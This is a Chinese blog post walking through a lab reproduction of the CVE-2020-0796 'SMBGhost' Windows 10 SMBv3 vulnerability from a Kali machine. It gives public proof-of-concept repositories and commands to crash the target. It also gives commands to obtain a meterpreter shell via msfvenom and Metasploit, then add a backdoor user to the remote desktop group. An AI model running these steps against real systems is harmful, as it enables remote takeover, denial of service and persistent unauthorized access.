Win10-永恒之黑漏洞复现

最新推荐文章于 2024-03-12 23:34:21 发布
最新推荐文章于 2024-03-12 23:34:21 发布
阅读量2.5k 收藏 53
点赞数 5
分类专栏: 漏洞复现 文章标签: windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52244272/article/details/133028729
版权

环境准备:win10(驱动版本10.0.18362.1)靶机、kali攻击机

漏洞介绍:

        2020年3月,微软公布SMB远程代码执行漏洞(CVE-2020-0796)又称“永恒之黑”,该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。

漏洞原理:

        SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

        Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。

        利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。

影响版本:

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server,Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server,Version 1909(Server Core installation)

目录

一、蓝屏攻击

二、getshell

一、蓝屏攻击

🌂下载工具

git clone https://github.com/ollypwn/SMBGhost.git

🌂进入工具目录下,进行扫描,出现下图字样即为存在漏洞

python3 scanner.py 靶机ip

🌂下载工具,进入目录,对靶机进行攻击

git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
python3 CVE-2020-0796.py 靶机ip

PS:缺少ntlm_auth模块,使用python3 -m pip install ntlm_auth,进行下载后再执行

🌂查看靶机,蓝屏

 

二、getshell

🌂下载exp,并拖入kali

https://github.com/chompie1337/SMBGhost_RCE_PoC

 🌂msfvenom生成正向连接攻击载荷,端口6666

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=6666 -b ‘\x00’ -i 1 -f python

🌂进入工具目录,修改exploit.py中buf后的字符串,保留USER_PAYLOAD不变(可以在物理机中修改后再拖回来,亦可直接vim打开后 :%s#buf#USER_PAYLOAD#g,把buf进行替换)

 

🌂进入msf,使用对应模块,监听目标机指定端口6666(与下一步同时进行,两个终端窗口

msfconsole use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 6666
set rhost 靶机ip
run

 

🌂同时,新开终端窗口,运行exploit.py脚本,反弹shell

python3 exploit.py -ip 靶机ip

 

🌂成功进入meterpreter,输入shell,利用system权限,添加用户lion,密码qwe@123,net user查看用户

 

🌂 将新建的用户lion加入远程组中,chcp 65001修改下编码

net localgroup "remote desktop users" lion /add

 

🌂此时lion用户已经在远程组中,物理机cmd输入mstsc,再输入靶机ip,远程登录连接win10靶机

 

 

 

至此,复现结束~ 

参考文章:

win10 永恒之黑复现_smbghost漏洞利用步骤_香芋320的博客-CSDN博客 

学习的小白_
关注
  • 5
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
WIN7-WIN10系统一键垃圾清理(超级版).bat
12-16
WIN7-WIN10系统一键垃圾清理(超级版)
Win10-UI 后台UI框架
01-02
Win10-UI是一款win10风格的后台UI框架,它使用了丰富的Win10桌面元素,包括桌面图标、窗口化子页面管理、开始菜单、动态小磁贴等组件,兼容主流现代浏览器及移动端的屏幕尺寸,适合快速开发后台管理系统的前端界面。
如何使用kali来入侵(渗透)一台windows
热门推荐
qq_46406833的博客
05-17 2万+
此文章为网络安全爱好者小白设计的,所以木马没做免杀,渗透前请把防火墙和杀毒软件关闭
漏洞复现】CVE-2020-0796永恒漏洞复现
qq_45244158的博客
03-29 1万+
文章目录一、漏洞描述二、影响版本三、漏洞检测四、漏洞复现环境五、(1)漏洞利用之蓝屏五、(2)漏洞利用之本地提权五、(3)漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3. 开启msf监听模块4. 运行exploit.py脚本,发起攻击反弹shell5. 执行成功,查看监听的地方,成功得到shell六、修复建议1.安装官方补丁2.禁用SMBv3压缩3.设置防火墙策略关闭相关端口4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务 一、漏洞描述.
Kali:简单实现永恒复现漏洞CVE-2020-0796
最新发布
2201_75638644的博客
03-12 1154
Kali:简单实现永恒复现漏洞CVE-2020-0796,2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务。这些漏洞现在都只能是做为初始kali渗透玩家的最基础攻击教程的素材,也只是来用于了解一下基础知识和这么一个使用流程。永恒(CVE-2020-0796)是一种影响Windows 10版本1903和1909的漏洞,存在于SMBv3协议中。其他版本的Windows操作系统不受此漏洞影响。
CVE-2020-0796永恒漏洞复现 超详细过程(成功复现
unlash的博客
10-20 5002
CVE-2020-0796永恒漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
【权限提升】 Windows10 本地提权漏洞复现及详细分析(CVE-2021-1732)
做自己喜欢的事,并将其发挥到极致!
12-07 4488
CVE-2021-1732 是蔓灵花(BITTER)APT 组织在某次被披露的攻击行动中使用的 0day 漏洞,该高危漏洞可以在本地将普通用户进程的权限提升至最高的 。属于windows系统级别的二进制漏洞
windows10 永恒复现(CVE-2020-0796)
qq_53579360的博客
11-13 1469
永恒复现
Windows 10 x64 1903的CVE-2020-0796漏洞利用
qq_74378387的博客
11-01 494
kaliWindows10 x64 1903:链接:https://pan.baidu.com/s/1qsScoI0s_Rd1ajURkvu86A?pwd=adadwin10登录密码为rootCVE-2020-0796的检测工具与getshell下载链接:https://pan.baidu.com/s/1r4Xo0VWetEU4KCeSWLhPIA?pwd=popo将靶机与kali使用同一网卡。
win 10 ISO 镜像文件之SXS
02-15
标题中的"win 10 ISO 镜像文件之SXS"指的是在Windows 10 ISO镜像中与“Side-by-Side”(SxS)组件相关的部分。SxS是Windows系统中一个关键的概念,用于管理不同版本的系统组件,特别是.NET Framework的各种版本。 ...
修复win10打印问题-适合20版本后.zip
11-08
因升级导致win10打印机 打印提示错误修复工具。 从事12年的IT运维工程师,在工作中发现有用的工具及问题并解决了的,分享给网友们。 希望能帮到您,有问题可以查看我用户名 Q我哦。记得点赞,收藏,关注我。谢谢支持...
Altera USB-Blaster win10 X64驱动
08-16
这个Altera USB-Blaster win10 X64驱动是可以在WIN10 X64位系统下运行的,里面2个压缩包文件,都可以用,其中X64文件夹里有8个驱动文件。把这个压缩包解压在某个盘的根目录下,然后来尝试以下步骤,一路试下来就好了...
永恒渗透win10
yy1024iy的博客
05-30 2049
这篇文章介绍了一种名为永恒的高级网络攻击工具,它利用微软Windows系统漏洞实现远程控制、篡改和窃取数据。文章详细描述了在攻击Win10计算机中使用永恒的操作步骤。与常规渗透攻击相比,永恒更加难以防御,这也让用户在保护自己计算机安全时需要更重视网络安全并定期更新系统和软件。
可以使任何人获得管理员权限的Windows 10系统漏洞
Candour_0的博客
02-03 521
可以使任何人获得管理员权限的Windows 10系统漏洞
网络安全学习day6——永恒漏洞复现
weixin_55123346的博客
01-15 1215
永恒漏洞复现
          永恒漏洞复现
Zhaokangkang123的博客
02-15 606
永恒漏洞复现
Kali MSF攻击Win10
nlj1860453的博客
01-05 1186
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
msf win10漏洞_永恒:CVE20200796漏洞复现
05-28
这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。 其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。 最后,您可以按照以下步骤进行CVE-2020-0796漏洞复现: 1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。 2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置: set RHOSTS [目标IP地址] set RPORT 445 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [攻击机IP地址] 3. 运行exploit命令,进行漏洞利用。 请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学习的小白_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值